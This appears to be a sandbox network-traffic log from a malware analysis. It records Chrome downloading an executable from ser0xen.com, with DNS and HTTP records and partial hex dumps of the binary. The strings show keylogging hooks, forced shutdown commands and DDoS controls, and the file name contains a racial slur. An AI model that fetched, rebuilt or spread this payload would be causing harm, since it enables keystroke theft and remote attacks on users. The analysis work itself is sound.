                Oct 7, 2024 03:27:19.196228027 CEST4434997113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.196321011 CEST49971443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.196563005 CEST49971443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.196573973 CEST4434997113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.293376923 CEST4434996713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.293454885 CEST4434996713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.293555975 CEST4434996713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.293631077 CEST49967443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.293765068 CEST49967443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.293800116 CEST4434996713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.293869019 CEST49967443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.293879986 CEST4434996713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.296212912 CEST49972443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.296257973 CEST4434997213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.296380997 CEST49972443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.296550035 CEST49972443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.296560049 CEST4434997213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.303493023 CEST4434996813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.303980112 CEST49968443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.304053068 CEST4434996813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.304430962 CEST49968443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.304445028 CEST4434996813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.407196045 CEST4434996813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.407397985 CEST4434996813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.407617092 CEST49968443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.407617092 CEST49968443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.408761024 CEST49968443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.408782005 CEST4434996813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.410208941 CEST49973443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.410233021 CEST4434997313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.410376072 CEST49973443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.410510063 CEST49973443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.410517931 CEST4434997313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.421514034 CEST4434996913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.421957016 CEST49969443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.421994925 CEST4434996913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.422415972 CEST49969443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.422424078 CEST4434996913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.520816088 CEST4434996913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.520880938 CEST4434996913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.520979881 CEST4434996913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.521105051 CEST49969443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.521179914 CEST49969443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.521202087 CEST4434996913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.521209955 CEST49969443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.521217108 CEST4434996913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.524306059 CEST49974443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.524333000 CEST4434997413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.524529934 CEST49974443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.524529934 CEST49974443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.524549961 CEST4434997413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.687448025 CEST4434997013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.688092947 CEST49970443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.688142061 CEST4434997013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.688631058 CEST49970443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.688644886 CEST4434997013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.786550999 CEST4434997013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.786655903 CEST4434997013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.786839008 CEST49970443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.786892891 CEST49970443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.786892891 CEST49970443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.786926985 CEST4434997013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.786969900 CEST4434997013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.789614916 CEST49975443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.789666891 CEST4434997513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.789882898 CEST49975443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.790054083 CEST49975443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.790071011 CEST4434997513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.837227106 CEST4434997113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.837778091 CEST49971443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.837798119 CEST4434997113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.838270903 CEST49971443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.838277102 CEST4434997113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.934690952 CEST4434997113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.935199976 CEST4434997113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.935256958 CEST49971443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.935300112 CEST49971443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.935300112 CEST49971443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.935322046 CEST4434997113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.935334921 CEST4434997113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.938143969 CEST49976443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.938219070 CEST4434997613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.938308954 CEST49976443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.938627958 CEST49976443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.938661098 CEST4434997613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.946419954 CEST4434997213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.946799994 CEST49972443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.946887016 CEST4434997213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.947490931 CEST49972443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.947504997 CEST4434997213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.048355103 CEST4434997213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.048521042 CEST4434997213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.048592091 CEST49972443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.048782110 CEST49972443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.048823118 CEST4434997213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.048871040 CEST49972443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.048887968 CEST4434997213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.051743031 CEST49977443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.051784039 CEST4434997713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.052125931 CEST49977443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.052213907 CEST49977443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.052222013 CEST4434997713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.060687065 CEST4434997313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.061156988 CEST49973443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.061168909 CEST4434997313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.061599016 CEST49973443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.061604023 CEST4434997313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.162448883 CEST4434997313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.162522078 CEST4434997313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.162559032 CEST4434997313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.162606001 CEST49973443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.162691116 CEST49973443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.162700891 CEST4434997313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.162712097 CEST49973443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.162717104 CEST4434997313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.165199041 CEST49978443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.165236950 CEST4434997813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.165312052 CEST49978443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.165504932 CEST49978443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.165518999 CEST4434997813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.178805113 CEST4434997413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.179208040 CEST49974443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.179228067 CEST4434997413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.179717064 CEST49974443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.179722071 CEST4434997413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.278934956 CEST4434997413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.279359102 CEST4434997413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.279422998 CEST49974443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.279464960 CEST49974443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.279484034 CEST4434997413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.279495955 CEST49974443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.279500961 CEST4434997413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.282435894 CEST49979443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.282478094 CEST4434997913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.282546043 CEST49979443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.282674074 CEST49979443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.282682896 CEST4434997913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.425220013 CEST4434997513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.425744057 CEST49975443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.425774097 CEST4434997513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.426218987 CEST49975443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.426227093 CEST4434997513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.524835110 CEST4434997513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.524997950 CEST4434997513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.525046110 CEST49975443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.525254965 CEST49975443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.525278091 CEST4434997513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.525300026 CEST49975443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.525306940 CEST4434997513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.528357029 CEST49980443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.528417110 CEST4434998013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.528476954 CEST49980443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.528628111 CEST49980443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.528640032 CEST4434998013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.576981068 CEST4434997613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.577617884 CEST49976443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.577650070 CEST4434997613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:20.578109980 CEST49976443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:20.578119040 CEST4434997613.107.246.60192.168.2.4
                TimestampSource PortDest PortSource IPDest IP
                Oct 7, 2024 03:25:47.599571943 CEST53550561.1.1.1192.168.2.4
                Oct 7, 2024 03:25:47.802436113 CEST53523001.1.1.1192.168.2.4
                Oct 7, 2024 03:25:48.800245047 CEST53532661.1.1.1192.168.2.4
                Oct 7, 2024 03:25:49.212255001 CEST5197953192.168.2.41.1.1.1
                Oct 7, 2024 03:25:49.212526083 CEST4958553192.168.2.41.1.1.1
                Oct 7, 2024 03:25:49.240329027 CEST53519791.1.1.1192.168.2.4
                Oct 7, 2024 03:25:49.242621899 CEST53495851.1.1.1192.168.2.4
                Oct 7, 2024 03:25:49.739305973 CEST5483653192.168.2.41.1.1.1
                Oct 7, 2024 03:25:49.739449024 CEST6018853192.168.2.41.1.1.1
                Oct 7, 2024 03:25:49.768570900 CEST53548361.1.1.1192.168.2.4
                Oct 7, 2024 03:25:49.789088964 CEST53601881.1.1.1192.168.2.4
                Oct 7, 2024 03:25:51.119725943 CEST5161553192.168.2.41.1.1.1
                Oct 7, 2024 03:25:51.119854927 CEST5767253192.168.2.41.1.1.1
                Oct 7, 2024 03:25:51.126739025 CEST53576721.1.1.1192.168.2.4
                Oct 7, 2024 03:25:51.126777887 CEST53516151.1.1.1192.168.2.4
                Oct 7, 2024 03:26:06.112026930 CEST53591461.1.1.1192.168.2.4
                Oct 7, 2024 03:26:07.085434914 CEST138138192.168.2.4192.168.2.255
                Oct 7, 2024 03:26:24.964072943 CEST53547601.1.1.1192.168.2.4
                Oct 7, 2024 03:26:46.981556892 CEST53644591.1.1.1192.168.2.4
                Oct 7, 2024 03:26:47.864787102 CEST53635701.1.1.1192.168.2.4
                Oct 7, 2024 03:27:15.572925091 CEST53492671.1.1.1192.168.2.4
                TimestampSource IPDest IPChecksumCodeType
                Oct 7, 2024 03:25:49.789288044 CEST192.168.2.41.1.1.1c232(Port unreachable)Destination Unreachable
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Oct 7, 2024 03:25:49.212255001 CEST192.168.2.41.1.1.10xaaf3Standard query (0)ser0xen.comA (IP address)IN (0x0001)false
                Oct 7, 2024 03:25:49.212526083 CEST192.168.2.41.1.1.10x95e5Standard query (0)ser0xen.com65IN (0x0001)false
                Oct 7, 2024 03:25:49.739305973 CEST192.168.2.41.1.1.10x83baStandard query (0)ser0xen.comA (IP address)IN (0x0001)false
                Oct 7, 2024 03:25:49.739449024 CEST192.168.2.41.1.1.10x2bbeStandard query (0)ser0xen.com65IN (0x0001)false
                Oct 7, 2024 03:25:51.119725943 CEST192.168.2.41.1.1.10xb6a7Standard query (0)www.google.comA (IP address)IN (0x0001)false
                Oct 7, 2024 03:25:51.119854927 CEST192.168.2.41.1.1.10x7ec9Standard query (0)www.google.com65IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Oct 7, 2024 03:25:49.240329027 CEST1.1.1.1192.168.2.40xaaf3No error (0)ser0xen.com18.224.107.108A (IP address)IN (0x0001)false
                Oct 7, 2024 03:25:49.768570900 CEST1.1.1.1192.168.2.40x83baNo error (0)ser0xen.com18.224.107.108A (IP address)IN (0x0001)false
                Oct 7, 2024 03:25:51.126739025 CEST1.1.1.1192.168.2.40x7ec9No error (0)www.google.com65IN (0x0001)false
                Oct 7, 2024 03:25:51.126777887 CEST1.1.1.1192.168.2.40xb6a7No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                Oct 7, 2024 03:26:05.563149929 CEST1.1.1.1192.168.2.40x1001No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                Oct 7, 2024 03:26:05.563149929 CEST1.1.1.1192.168.2.40x1001No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                Oct 7, 2024 03:26:21.215241909 CEST1.1.1.1192.168.2.40x183bNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                Oct 7, 2024 03:26:21.215241909 CEST1.1.1.1192.168.2.40x183bNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                Oct 7, 2024 03:26:40.059861898 CEST1.1.1.1192.168.2.40x7788No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                Oct 7, 2024 03:26:40.059861898 CEST1.1.1.1192.168.2.40x7788No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                Oct 7, 2024 03:26:43.893946886 CEST1.1.1.1192.168.2.40x1ba2No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                Oct 7, 2024 03:26:43.893946886 CEST1.1.1.1192.168.2.40x1ba2No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                Oct 7, 2024 03:27:00.496539116 CEST1.1.1.1192.168.2.40x876fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                Oct 7, 2024 03:27:00.496539116 CEST1.1.1.1192.168.2.40x876fNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                • ser0xen.com
                • fs.microsoft.com
                • slscr.update.microsoft.com
                • otelrules.azureedge.net
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.44973518.224.107.108801460C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                Oct 7, 2024 03:25:49.248366117 CEST448OUTGET /sucklemydicknigger.exe HTTP/1.1
                Host: ser0xen.com
                Connection: keep-alive
                Upgrade-Insecure-Requests: 1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Encoding: gzip, deflate
                Accept-Language: en-US,en;q=0.9
                Oct 7, 2024 03:25:49.735582113 CEST549INHTTP/1.1 301 Moved Permanently
                Date: Mon, 07 Oct 2024 01:25:49 GMT
                Server: Apache/2.4.59 (Amazon Linux) OpenSSL/3.0.8
                Location: https://ser0xen.com/sucklemydicknigger.exe
                Content-Length: 250
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 30 78 65 6e 2e 63 6f 6d 2f 73 75 63 6b 6c 65 6d 79 64 69 63 6b 6e 69 67 67 65 72 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ser0xen.com/sucklemydicknigger.exe">here</a>.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.44973618.224.107.108801460C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                Oct 7, 2024 03:26:34.252096891 CEST6OUTData Raw: 00
                Data Ascii:


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.44973718.224.107.1084431460C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2024-10-07 01:25:50 UTC676OUTGET /sucklemydicknigger.exe HTTP/1.1
                Host: ser0xen.com
                Connection: keep-alive
                Upgrade-Insecure-Requests: 1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: navigate
                Sec-Fetch-User: ?1
                Sec-Fetch-Dest: document
                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                sec-ch-ua-mobile: ?0
                sec-ch-ua-platform: "Windows"
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                2024-10-07 01:25:50 UTC286INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:25:50 GMT
                Server: Apache/2.4.59 (Amazon Linux) OpenSSL/3.0.8
                Last-Modified: Thu, 03 Oct 2024 01:42:24 GMT
                ETag: "9a00-62388aa8aa000"
                Accept-Ranges: bytes
                Content-Length: 39424
                Connection: close
                Content-Type: application/octet-stream
                2024-10-07 01:25:50 UTC7906INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ff d0 f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 90 00 00 00 08 00 00 00 00 00 00 9e af 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf @ @
                2024-10-07 01:25:50 UTC8000INData Raw: 00 00 0c 00 00 00 28 00 00 01 00 00 00 00 70 07 00 00 25 00 00 00 95 07 00 00 0c 00 00 00 28 00 00 01 00 00 00 00 38 06 00 00 6b 01 00 00 a3 07 00 00 0f 00 00 00 28 00 00 01 00 00 00 00 00 00 00 00 b4 07 00 00 b4 07 00 00 1b 00 00 00 28 00 00 01 1b 30 0a 00 b2 04 00 00 1f 00 00 11 28 c1 00 00 0a 02 6f c2 00 00 0a 6f c3 00 00 0a 13 05 16 13 04 38 67 04 00 00 11 05 11 04 9a 0a 06 6f c4 00 00 0a 72 45 08 00 70 16 28 6c 00 00 0a 16 40 44 04 00 00 06 6f c5 00 00 0a 13 07 16 13 06 38 29 04 00 00 11 07 11 06 9a 0b 07 14 72 cf 04 00 70 16 8d 03 00 00 01 14 14 14 28 35 00 00 0a 72 53 08 00 70 16 28 c6 00 00 0a 2c 65 07 14 72 5b 08 00 70 18 8d 03 00 00 01 13 09 11 09 16 14 a2 11 09 17 1b 8d 03 00 00 01 13 08 11 08 16 7e 07 00 00 04 a2 11 08 17 7e 08 00 00 04 a2 11
                Data Ascii: (p%(8k((0(oo8gorEp(l@Do8)rp(5rSp(,er[p~~
                2024-10-07 01:25:50 UTC8000INData Raw: a7 14 8c 03 0a 00 c0 14 03 0c 06 00 ee 14 8c 03 0e 00 fc 14 42 03 06 00 1c 15 73 01 16 00 85 15 76 15 16 00 8e 15 76 15 16 00 93 15 76 15 16 00 9d 15 76 15 0a 00 a4 15 13 00 0a 00 ac 15 13 00 1a 00 23 02 ba 15 0e 00 d7 15 42 03 06 00 ef 15 73 01 0a 00 29 16 13 00 0a 00 87 16 66 16 06 00 a2 16 1d 08 1a 00 cb 16 ba 15 16 00 1b 17 04 17 16 00 27 17 76 15 16 00 37 17 76 15 16 00 59 17 76 15 16 00 70 17 04 17 06 00 ab 17 99 17 06 00 b6 17 73 01 06 00 d2 17 99 17 06 00 e9 17 99 17 06 00 2e 18 73 01 0e 00 3f 18 d8 0b 06 00 8b 18 70 18 06 00 d6 18 73 01 1e 00 f5 18 e9 18 06 00 00 19 70 18 0e 00 12 19 c4 0f 0e 00 21 19 c4 0f 0e 00 31 19 c4 0f 0e 00 7e 19 c4 0f 06 00 b4 19 99 17 06 00 bf 19 99 17 06 00 db 19 5a 07 06 00 f6 19 22 0d 06 00 16 1a 22 0d 06 00 29 1a 22
                Data Ascii: Bsvvvv#Bs)f'v7vYvps.s?psp!1~Z"")"
                2024-10-07 01:25:50 UTC8000INData Raw: 43 6f 64 65 00 47 65 74 41 63 74 69 76 65 57 69 6e 64 6f 77 54 69 74 6c 65 00 57 4d 5f 4b 45 59 44 4f 57 4e 00 5f 70 72 6f 63 00 5f 68 6f 6f 6b 49 44 00 53 65 74 57 69 6e 64 6f 77 73 48 6f 6f 6b 45 78 00 69 64 48 6f 6f 6b 00 6c 70 66 6e 00 68 4d 6f 64 00 64 77 54 68 72 65 61 64 49 64 00 55 6e 68 6f 6f 6b 57 69 6e 64 6f 77 73 48 6f 6f 6b 45 78 00 68 68 6b 00 43 61 6c 6c 4e 65 78 74 48 6f 6f 6b 45 78 00 47 65 74 4d 6f 64 75 6c 65 48 61 6e 64 6c 65 00 6c 70 4d 6f 64 75 6c 65 4e 61 6d 65 00 57 48 4b 45 59 42 4f 41 52 44 4c 4c 00 47 65 74 46 6f 72 65 67 72 6f 75 6e 64 57 69 6e 64 6f 77 00 47 65 74 57 69 6e 64 6f 77 54 68 72 65 61 64 50 72 6f 63 65 73 73 49 64 00 68 57 6e 64 00 6c 70 64 77 50 72 6f 63 65 73 73 49 64 00 47 65 74 4b 65 79 53 74 61 74 65 00 6b 65
                Data Ascii: CodeGetActiveWindowTitleWM_KEYDOWN_proc_hookIDSetWindowsHookExidHooklpfnhModdwThreadIdUnhookWindowsHookExhhkCallNextHookExGetModuleHandlelpModuleNameWHKEYBOARDLLGetForegroundWindowGetWindowThreadProcessIdhWndlpdwProcessIdGetKeyStateke
                2024-10-07 01:25:50 UTC7518INData Raw: 68 00 75 00 74 00 64 00 6f 00 77 00 6e 00 2e 00 65 00 78 00 65 00 20 00 2f 00 66 00 20 00 2f 00 73 00 20 00 2f 00 74 00 20 00 30 00 00 13 50 00 43 00 52 00 65 00 73 00 74 00 61 00 72 00 74 00 00 2f 73 00 68 00 75 00 74 00 64 00 6f 00 77 00 6e 00 2e 00 65 00 78 00 65 00 20 00 2f 00 66 00 20 00 2f 00 72 00 20 00 2f 00 74 00 20 00 30 00 00 11 50 00 43 00 4c 00 6f 00 67 00 6f 00 66 00 66 00 00 1f 73 00 68 00 75 00 74 00 64 00 6f 00 77 00 6e 00 2e 00 65 00 78 00 65 00 20 00 2d 00 4c 00 01 11 52 00 75 00 6e 00 53 00 68 00 65 00 6c 00 6c 00 00 13 53 00 74 00 61 00 72 00 74 00 44 00 44 00 6f 00 73 00 00 11 53 00 74 00 6f 00 70 00 44 00 44 00 6f 00 73 00 00 17 53 00 74 00 61 00 72 00 74 00 52 00 65 00 70 00 6f 00 72 00 74 00 00 15 53 00 74 00 6f 00 70 00 52 00 65
                Data Ascii: hutdown.exe /f /s /t 0PCRestart/shutdown.exe /f /r /t 0PCLogoffshutdown.exe -LRunShellStartDDosStopDDosStartReportStopRe


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.449741184.28.90.27443
                TimestampBytes transferredDirectionData
                2024-10-07 01:25:53 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
